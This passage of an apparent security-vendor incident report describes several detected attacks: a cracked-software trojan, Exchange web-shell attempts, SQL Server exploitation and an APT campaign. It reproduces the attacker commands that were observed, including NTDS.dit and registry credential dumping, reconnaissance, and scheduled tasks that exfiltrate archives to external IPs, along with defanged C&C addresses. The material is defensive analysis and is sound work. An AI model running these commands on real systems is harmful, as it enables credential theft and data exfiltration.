The scheduled task invokes a VBS script (file path: C:\Windows\System32\r4RYLepG5\9B2278BC-F6CB-46D1-A73D-5B5D8AF9AC7C, MD5 106BC66F5A6E62B604D87FA73D70A708), which decodes from the Base64-encoded content of the file C:\Windows\System32\drivers\S2cZVnXzpZ\02F4F239-0922-49FE-A338-C7460CB37D95.sys, and then executes the latter.

The VBS script mimics the content and behavior of the legitimate C:\Windows\System32\SyncAppvPublishingServer.vbs file, but the path and file name are different.

The customer approved our MDR SOC analyst’s request to analyze the file C:\Windows\System32\drivers\S2cZVnXzpZ\02F4F239-0922-49FE-A338-C7460CB37D95.sys. A quick analysis revealed a Base64-encoded payload inside long text content (see the picture below).

The decoded payload contained a link to a C&C server:

Further telemetry analysis showed that the infection was probably caused by the following process, likely a malicious activator (MD5 F0829E688209CA94305A256B25FEFAF0):

C:\Users\<… cut out … >\Downloads\ExcelAnalyzer 3.4.3\crack\Patch.exe

The activator was downloaded with the Tixati BitTorrent client and executed by a member of the local Administrators group.

Fortunately, the telemetry analysis did not reveal any evidence of malicious activity from the discovered C&C server (counter[.]wmail-service[.]com), which would have allowed downloading further stages of infection. In the meantime, a new AM engine signature was released, and the malicious samples were now detected as Trojan-Dropper.Win64.Agent.afp (F0829E688209CA94305A256B25FEFAF0) and Trojan.PowerShell.Starter.o (106BC66F5A6E62B604D87FA73D70A708). The C&C URL was correctly classified as malicious.

Case detection

The table below lists the attack techniques and how they were detected by Kaspersky MDR.

MITRE ATT&CK Technique MDR telemetry event type used Detection details Description
T1547.001: Registry Run Keys / Startup Folder
  1. Autostart entry
Regex on autostart entry details Malicious persistence
  1. AM detection
Heuristic AM engine verdict: HEUR:Trojan.Multi.Agent.gen
T1059.001: PowerShell
  1. Autostart entry
Regex on autostart entry details Execution of PowerShell code via “ScriptBlock” instead of “Invoke-Expression”
T1216.001: System Script Proxy Execution
  1. Process start
Regex on command line Malicious payload execution via C:\Windows\System32\
SyncAppvPublishingSer
ver.vbs
T1204.002: Malicious File
  1. Process start
Execution sequence: svchost.exe
→ explorer.exe → patch.exe
From directory: C:\Users\<
removed>\Downloads\ExcelAnaly
zer 3.4.3\crack\
The user executed a file downloaded by the Tixati BitTorrent client
As a result, the file 02f4f239-0922-49fe-
a338-c7460cb37d95.sys was created
  1. Local file operation
Creation of
c:\users\<removed>\downloads\ex
celanalyzer
3.4.3\setup_excelanalyzer.exe
In this order: chrome.exe →
tixati.exe
  1. Local file operation
Creation of 02f4f239-0922-49fe-
a338-c7460cb37d95.sys
In this order: svchost.exe →
patch.exe
Process command line:
“C:\Users\<removed>\Downloads\
ExcelAnalyzer
3.4.3\crack\Patch.exe”
The contents of 02f4f239-0922-
49fe-a338-c7460cb37d95.sys do
not match the extension (text
instead of binary).
T1027: Obfuscated Files or Information
T1140: Deobfuscate/Decode Files or Information
The suspicious file 02f4f239-0922-49fe-a338-c7460cb37d95.sys was requested from the customer via an MDR response 02f4f239-0922-49fe-a338-
c7460cb37d95.sys contained text;
starting on line 4890, it contained
a Base-64-encoded payload.
Attacker hid payload
T1071.001: Web Protocols
  1. HTTP connection
  2. Network connection
The SOC checked for successful connections to the discovered C&C server. A search for the attacker’s possible attempts to execute further stages of the attack

Server-side attacks on the perimeter

Case #1: A ProxyShell vulnerability in Microsoft Exchange

Case description

During manual threat hunting, the Kaspersky SOC team detected suspicious activity on a Microsoft Exchange server: the process MSExchangeMailboxReplication.exe attempted to create several suspicious files:

\\127.0.0.1\c$\inetpub\wwwroot\aspnet_client\rqfja.aspx
c:\program files\microsoft\exchange server\v15\frontend\httpproxy\ecp\auth\yjiba.aspx
c:\program files\microsoft\exchange server\v15\frontend\httpproxy\owa\auth\jiwkl.aspx
c:\program files\microsoft\exchange server\v15\frontend\httpproxy\owa\auth\current\qwezb.aspx
c:\program files\microsoft\exchange server\v15\frontend\httpproxy\owa\auth\current\scripts\qspwi.aspx
c:\program files\microsoft\exchange server\v15\frontend\httpproxy\owa\auth\current\scripts\premium\upxnl.aspx
c:\program files\microsoft\exchange server\v15\frontend\httpproxy\owa\auth\current\themes\qikyp.aspx
c:\program files\microsoft\exchange server\v15\frontend\httpproxy\owa\auth\current\themes\resources\jvdyt.aspx
c:\program files\microsoft\exchange server\v15\frontend\httpproxy\ecp\auth\mgsjz.aspx

The ASPX file format, which the service should not create, and the random file names led our SOC analyst to believe that those files were web shells.

Telemetry analysis of the suspicious file creation attempts showed that Kaspersky Endpoint Security (KES) had identified the process behavior as PDM:Exploit.Win32.Generic and blocked some of the activities.

Similar behavior was detected the next day, this time an attempt at creating one file:

\\127.0.0.1\c$\inetpub\wwwroot\aspnet_client\rmvbe.aspx

KES had blocked the exploitation attempts. Nonetheless, the attempts themselves indicated that the Microsoft Exchange server was vulnerable and in need of patching as soon as possible.

Case detection

The table below lists the attack techniques and how these were detected by Kaspersky MDR.

MITRE ATT&CK Technique MDR telemetry event type used Detection details Description
T1190: Exploit Public-Facing Application
  1. AM detection
Heuristic AM engine verdict: PDM:Exploit.Win32.Generic Exploitation attempt
T1505.003: Web Shell
  1. Local file operation
Attempts at creating ASPX files using the MSExchangeMailboxReplication.exe process Web shell file creation

Case #2: MS SQL Server exploitation

Case description

The incident was detected due to suspicious activity exhibited by sqlservr.exe, a legitimate Microsoft SQL Server process. At the time of detection, the account active on the host was S-1-5-21-<…>-<…>-<…>-181797 (Domain / username).

The SQL Server process attempted to create a suspicious file:

c:\windows\serviceprofiles\mssql$sqlexpress\appdata\local\temp\tmpd279.tmp

We observed that a suspicious assembly was loaded to the sqlserver process (c:\program files\microsoft sql server\mssql15.sqlexpress\mssql\binn\sqlservr.exe) db_0x2D09A3D6\65536_fscbd (MD5 383D20DE8F94D12A6DED1E03F53C1E16) with the original file name evilclr.dll.

The file was detected by the AM engine as HEUR:Trojan.MSIL.Starter.gen, Trojan.Multi.GenAutorunSQL.b.

The SQL server host had previously been seen accessible from the Internet and in the process of being scanned by a TOR network.

After the suspicious assembly load, the AM engine detected execution of malicious SQL jobs. The SQL jobs contained obfuscated PowerShell commands. For example:

The created SQL jobs attempted to connect to URLs like those shown below:

hxxp://101.39.<…cut…>.58:16765/2E<…cut…>2F.Png
hxxp://103.213.<…cut…>.55:15909/2E<…cut…>2F.Png
hxxp://117.122.<…cut…>.10:19365/2E<…cut…>2F.Png
hxxp://211.110.<…cut…>.208:19724/2E<…cut…>2F.Png
hxxp://216.189.<…cut…>.94:19063/2E<.cut...>2F.Png
hxxp://217.69.<…cut…>.139:13171/2E<…cut…>2F.Png
hxxp://222.138.<…cut…>.26:17566/2E<…cut…>2F.Png
hxxp://222.186.<…cut…>.157:14922/2E<…cut…>2F.Png
hxxp://45.76.<…cut…>.180:17128/2E<…cut…>2F.Png
hxxp://59.97.<…cut…>.243:17801/2E<…cut…>2F.Png
hxxp://61.174.<…cut…>.163:15457/2E<…cut…>2F.Png
hxxp://67.21.<…cut…>.130:12340/2E<…cut…>2F.Png
hxxp://216.189.<…cut…>.94:19063/2E<…cut…>2F.Png
hxxp://67.21.<…cut…>.130:12340/2E<…cut…>2F.Png

Some of the IP addresses were already on the deny list, while others were added in response to this incident.

We were not able to observe any other host within the monitoring scope attempt to connect to these IP addresses, which confirmed that the attack was detected at an early stage.

The next day, the same activity, with the same verdicts (HEUR:Trojan.MSIL.Starter.gen, Trojan.Multi.GenAutorunSQL.b) was detected on another SQL Server host, which was also accessible from the Internet.

Since the attack was detected in time, and its further progress was blocked by the AM engine, the attacker was not able to proceed, while the customer corrected the network configuration errors to block access to the server from the Internet.

Case detection

The table below lists the attack techniques and how these were detected by Kaspersky MDR.

MITRE ATT&CK Technique MDR telemetry event type used Detection details Description
T1090.003: Multi-hop Proxy
T1595.002: Vulnerability Scanning
  1. Network connection
  2. AM detection
Reputation analysis showed the use of TOR network for scanning. The scanning activity was detected through network connection analysis and by the AM engine. The attacker scanned the SQL Server host
T1190: Exploit Public-Facing Application
  1. Process start
The server application sqlservr.exe launched powershell.exe, in the following order: services.exe → sqlservr.exe → powershell.exe The attacker successfully exploited the SQL server
  1. Autostart entry
Execution of the object previously detected as an autostart entry with a bad reputation: sql:\SQLEXPRESS\db_0x2D09A3D6\65537_fscbd; original file name: evilclr.dll
T1059.001: PowerShell
  1. Autostart entry
  2. Process start
Command line analysis showed the use of PowerShell. Malicious persistence via an SQL Server job
T1027: Obfuscated Files or Information
  1. Autostart entry
Regex- and ML-based analysis of the SQL Server Agent job command line The attacker attempted to evade detection
  1. Process start
Regex- and ML-based analysis of the services.exe → sqlservr.exe → powershell.exe execution sequence command line
T1505.001: SQL Stored Procedures
  1. Autostart entry
SQL Server Agent job analysis Malicious persistence via an SQL Server job
  1. AM detection
  2. AM detection on suspicious activity
Heuristic detects on PowerShell SQL Server Agent; verdict: HEUR:Trojan.Multi.Powecod.a
T1071.001: Web Protocols
  1. HTTP connection
  2. AM detection
The URL reputation as well as an AM generic heuristic verdict similar to HEUR:Trojan.Multi.GenBadur.genw pointed to the use of a malicious C&C server. The attacker’s C&C server

What does exfiltration in a real-life APT look like?

Case #1: Collecting and stealing documents

Case description

Kaspersky MDR detected suspicious activity on one particular host in customer infrastructure, as the following process was started remotely by psexec:

“cmd.exe” /c “c:\perflogs\1.bat”, which started:

findstr  "10.<…cut…>.
wevtutil qe security /rd:true /f:text /q:"*[EventData/Data[@Name='TargetUserName']='<username1>'] and *[System[(EventID=4624) or (EventID=4623) or (EventID=4768) or (EventID=4776)]]"  /c:1 
wevtutil qe security /rd:true /f:text /q:"*[EventData/Data[@Name='TargetUserName']='<username2>'] and *[System[(EventID=4624) or (EventID=4623) or (EventID=4768) or (EventID=4776)]]" /c:1

After that, the following inventory commands were executed by the binary C:\ProgramData\USOPrivate\ UpdateStore\windnphd.exe:

C:\Windows\system32\cmd.exe /C ping 10.<…cut…> -n 2 
query  user 
C:\Windows\system32\cmd.exe /C tasklist /S 10.<…cut…> -U <domain>\<username3> -P <password>   
C:\Windows\system32\cmd.exe /C net use \\10.<…cut…>\ipc$ "<password>" /u:<domain>\<username3>    
C:\Windows\system32\cmd.exe /C net group "domain admins" /domain    
C:\Windows\system32\cmd.exe /C ping <hostname1>    
C:\Windows\system32\cmd.exe /C vssadmin list shadows    
C:\Windows\system32\cmd.exe /C ipconfig /all    
C:\Windows\system32\cmd.exe /C dir \\10.<…cut…>\c$

Suspicious commands triggering actions in the Active Directory Database were executed:

C:\Windows\system32\cmd.exe /C ntdsutil snapshot "activate instance ntds" create quit  
C:\Windows\system32\cmd.exe /C dir c:\windows\system32\ntds.dit 
C:\Windows\system32\cmd.exe /C dir c:\  
C:\Windows\system32\cmd.exe /C dir c:\windows\ntds\ntds.dit
After these commands were executed, the windnphd.exe process started an HTTP connection:
hxxp[:]//31.192.234[.]60:53/useintget
Then a suspicious file, c:\users\public\nd.exe (MD5 AAE3A094D1B019097C7DFACEA714AB1B), created by the windnphd.exe process, executed the following commands:
nd.exe  c:\windows\system32\config\system c:\users\public\sys.txt   
nd.exe  c:\windows\ntds\ntds.dit c:\users\public\nt.txt 
C:\Windows\system32\cmd.exe /C move *.txt c:\users\public\tmp   
C:\Windows\system32\cmd.exe /C rar.exe a -k -r -s -m1  c:\users\public\n.rar   c:\users\public\tmp\ 
rar.exe  a -k -r -s -m1  c:\users\public\n.rar   c:\users\public\tmp\
Later, the SOC observed that a suspicious scheduled task had been created on the same host:
schtasks  /create  /sc minute /mo 30 /ru system  /tn \tmp /tr "c:\users\public\s.exe c:\users\public\0816-s.rar 38[.]54[.]14[.]183 53 down"  /f
The task executed a suspicious file: c:\users\public\s.exe (MD5 6C62BEED54DE668234316FC05A5B2320)

This executable used the archive c:\users\public\0816-s.rar and the suspicious IP address 38[.]54[.]14[.]183, located in Vietnam, as parameters.

The 0816-s.rar archive was created via remote execution of the following command through psexec:

rar a -k -r -s -ta[Pass_in_clear_text] -m1  c:\users\public\0816-s.rar   "\\10.<…cut…>\c$\users\<username4>\Documents\<DocumentFolder1>"

After that, we detected a suspicious network connection to the IP address 38[.]54[.]14[.]183 from the s.exe executable. The activity looked like an attempt to transfer the data collected during the attack to the attacker’s C&C server.

Similar suspicious behavior was detected on another host, <hostname>.

First, a suspicious file was created over the SMB protocol: c:\users\public\winpdasd.exe (MD5: B83C9905F57045110C75A950A4EE56E4).

Next, a task was created remotely via psexec.exe:

schtasks  /create  /sc minute /mo 30 /ru system  /tn \tmp /tr "c:\users\public\winpdasd.exe"  /f

During task execution, an external network communication was detected, and certain discovery commands were executed:

hxxp://31[.]192.234.60:53/useintget
ping  10.<…cut…> -n 1
query  user
net  use

This was followed by a connection to a network share on the host 10.<…cut…> as username3:

C:\Windows\system32\cmd.exe /C net use \\10.<…cut…>\ipc$ "<password>" /u:<domain>\<username3>

More reconnaissance command executions were detected:

C:\Windows\system32\cmd.exe /C dir \\10.<…cut…>\c$\users\<username4>\AppData\Roaming\Adobe\Linguistics
C:\Windows\system32\cmd.exe /C tasklist /S 10.<…cut…> -U <domain>\<username3> -P <password> |findstr rundll32.exe
tasklist  /S 10.<…cut…> -U <domain>\<username3> -P <password>
C:\Windows\system32\cmd.exe /C taskkill /S 10.<…cut…> -U <domain>\<username3> -P <password> /pid <PID> /f
C:\Windows\system32\cmd.exe /C schtasks /run /s 10.<…cut…> /u <domain>\<username3> /p "<password>" /tn \Microsoft\Windows\Tcpip\dcrpytod

Then winpdasd.exe created the file windpchsvc.exe (MD5: AE03B4C183EAA7A4289D8E3069582930) and set it up as a task:

C:\Windows\system32\cmd.exe /C schtasks /create  /sc minute /mo 30 /ru system  /tn \Microsoft\Windows\Network\windpch /tr "C:\Users\admin\AppData\Roaming\Microsoft\Network\windpchsvc.exe"  /f

After that, C&C communications were detected:

hxxp://139.162.35[.]70:53/micsoftgp

This incident, a fragment of a long-running APT campaign, demonstrates a data collection scenario. It shows that the attacker’s final goal was to spy on and monitor the victim’s IT infrastructure. Another feature of targeted attacks that can be clearly seen from this incident is the use of custom tools. An analysis of these is given later in this report as an example.

Case detection

The table below lists the attack techniques and how these were detected by Kaspersky MDR.

MITRE ATT&CK Technique MDR telemetry event type used Detection details Description
T1569.002: Service Execution
  1. Process start
Command line analysis The attacker performed reconnaissance and search in local logs
The attacker persisted in the victim’s system through service creation
  1. Windows event
Windows events on service installation and service start
  1. AM detection on suspicious activity
AM behavior analysis The attacker executed windnphd.exe through psexec
T1592: Gather Victim Host Information
T1590: Gather Victim Network Information
  1. Process start
Command line analysis The attacker performed internal reconnaissance
T1021.002: SMB/Windows Admin Shares
  1. Share access
Inbound and outbound share access The attacker tried to access:
\\10.<…cut…>.65\ipc$
\\10.<…cut…>.52\c$
T1003.003: NTDS
  1. Process start
Command line analysis The attacker accessed NTDS.dit with ntdsutil
T1071.001: Web Protocols
  1. HTTP connection
  2. Network connection
The SOC checked if the data transfer was successful The attacker communicated with the C&C server at hxxp[:]//31.192.234[
.]60:53/useintget
  1. AM detection on suspicious activity
The connection was initiated by the suspicious process windnphd.exe
T1571: Non-Standard Port
  1. HTTP connection
  2. Network connection
The SOC detected the use of the HTTP protocol on the non-standard 53/TCP port Attacker used the C&C server hxxp[:]//31.192.234[
.]60:53/useintget
T1587.001: Malware
  1. Local file operation
  2. Process start
  3. AM detection on suspicious activity
Use of various suspicious binaries prepared by the attacker specifically for this attack The attacker used custom tools:
s.exe
winpdasd.exe
windpchsvc.exe
(see detailed report below)
T1497: Virtualization/Sandbox Evasion
  1. Malware analysis
Detected the HookSleep function (see below) The attacker attempted to detect sandboxing. The emulation detection was found in the custom tools: winpdasd.exe and windpchsvc.exe
T1036.005: Match Legitimate Name or Location
  1. Local file operation
  2. Malware analysis
Operations with the file c:\users\Default\ntusers.dat The attacker attempted to hide a shellcode inside a file with a name similar to the legitimate ntuser.dat
T1140: Deobfuscate/Decode Files or Information
  1. Local file operation
  2. Malware analysis
The file ntusers.dat contained an encoded shellcode, which was later executed by winpdasd.exe and windpchsvc.exe The attacker executed arbitrary code
T1560.001: Archive via Utility
  1. Process start
Use of the RAR archiver for data collection The attacker archived the stolen credentials and documents
T1048.003: Exfiltration Over Unencrypted Non-C2 Protocol
  1. Process start
Command line analysis The attacker used a custom tool to exfiltrate data
  1. Network connection
Analysis of the process that initiated the connection

An analysis of the custom tools used by the attacker

windpchsvc.exe and winpdasd.exe

Both malware samples are designed to extract a payload from a file, decode it, and directly execute it via a function call. The payload is encoded shellcode.

Both files read in from a file intended to deceive investigators and users by applying naming conventions that are similar to system files:

Payload file for windpchsvc.exe

Payload file for windpchsvc.exe

The malware, windpchsvc.exe, reads from the file c:\users\Default\ntusers.dat. A legitimate file, named ntuser.dat, exists in this location. Note that the bona fide registry file does not contain an ‘s’.

A similar file name was used for the winpdasd.exe malware:

Payload file for winpdasd.exe

Payload file for winpdasd.exe

The malware reads from this file and decodes the bytes for direct execution via a function call as seen below (call [ebp+payload_alloc] and call esi ):

windpchsvc.exe: decode, allocate memory, copy to mem, execute

windpchsvc.exe: decode, allocate memory, copy to mem, execute

winpdasd.exe: decode, allocate memory, copy to mem, execute via function call

winpdasd.exe: decode, allocate memory, copy to mem, execute via function call

The payload files (ntusers.dat) contain the main logic, while the samples we analyzed are just the loaders.

Some of the images show a function that I labeled “HookSleep” and which might be used for sandbox evasion in other forms of this malware. The function has no direct effect on the execution of the payload.

The decompiled function can be seen below:

The "HookSleep" function found in both files, decompiled

The “HookSleep” function found in both files, decompiled

When debugging, this worked as expected. The Win32 Sleep function is directed to the defined function in the malware:

The Sleep function redirected back to the malware code

The Sleep function redirected back to the malware code

s.exe

This file can be classified as a simple network transfer tool capable of uploading or downloading. The basic parameters are as follows:

s.exe <file> <IP address> <port> <up|down>

This is basically netcat without all the features. The benefit of this is that it does not draw as much attention as netcat. In fact, while testing, we found that netcat, when set to listen, was able to receive a file from this sample and output to a file (albeit with some added junk characters in the results). We also found that the sample was incapable of executing anything after a download or upload.

The algorithm is pretty simple: network startup, parse arguments, create socket, send file or wait for file based on arguments. The decompiled main function can be seen below:

Decompiled network transfer tool

Decompiled network transfer tool

[1] The actual name of the binary is unimportant; hence it was skipped.
[2] Kaspersky Endpoint Security efficiently protects LSASS memory.

]]>
https://securelist.com/server-side-attacks-cc-in-public-clouds-mdr-cases/107826/feed/ 0 full large medium thumbnail
External attack surface and ongoing cybercriminal activity in APAC region https://securelist.com/external-attack-surface-and-ongoing-cybercriminal-activity-in-apac-region/107430/ https://securelist.com/external-attack-surface-and-ongoing-cybercriminal-activity-in-apac-region/107430/#respond Mon, 19 Sep 2022 14:00:21 +0000 https://kasperskycontenthub.com/securelist/?p=107430

To prevent a cyberattack, it is vital to know what the attack surface for your organization is. To be prepared to repel the attacks of cybercriminals, businesses around the world collect threat intelligence themselves or subscribe for threat intelligence services.

Continuous threat research enables Kaspersky to discover, infiltrate and monitor resources frequented by adversaries and cybercriminals worldwide. Kaspersky Digital Footprint Intelligence leverages this access to proactively detect threats targeted at organizations worldwide, their assets or brands, and alert our customers to them.

In our public reports, we provide overview of threats for different industries and regions based on the anonymized data collected by Kaspersky Digital Footprint Intelligence. Last time, we shared insights on the external attack surface for businesses and government organizations in the Middle East. This report focuses on Asia Pacific, Australia and China. We analyzed data on external threats and criminal activities affecting more than 4,700 organizations in 15 countries and territories across this region.

Main findings

  • Kaspersky Digital Footprint Intelligence found 103,058 exposed network services with unpatched software. Government institutions’ network resources were the most affected by known vulnerabilities.
  • More than one in ten encountered vulnerabilities in the external perimeters of organizations were ProxyLogon. In Japan, this vulnerability was found in 43% of all unpatched services.
  • 16,003 remote access and management services were available for attackers. Government institutions were the most affected ones.
  • On the Darknet, hackers prefer to buy and sell accesses to organizations from Australia, mainland China, India and Japan.
  • Australia, mainland China, India and Singapore comprise 84% of all data leak sell orders placed on Darknet forums.

You can find more information about the external attack surface for organizations in APAC region, as well as data sold and searched for in the dark web, in the full version of our report. Fill in the form to download it.

If you do not see the form above this sentence, please, add this page to exceptions in your browser privacy settings and/or your ad blocker.

]]>
https://securelist.com/external-attack-surface-and-ongoing-cybercriminal-activity-in-apac-region/107430/feed/ 0 full large medium thumbnail